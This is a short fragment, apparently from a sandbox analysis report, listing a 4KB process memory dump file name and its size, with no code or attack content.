
                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                      • memory/6104-656-0x0000000005440000-0x0000000005441000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        4KB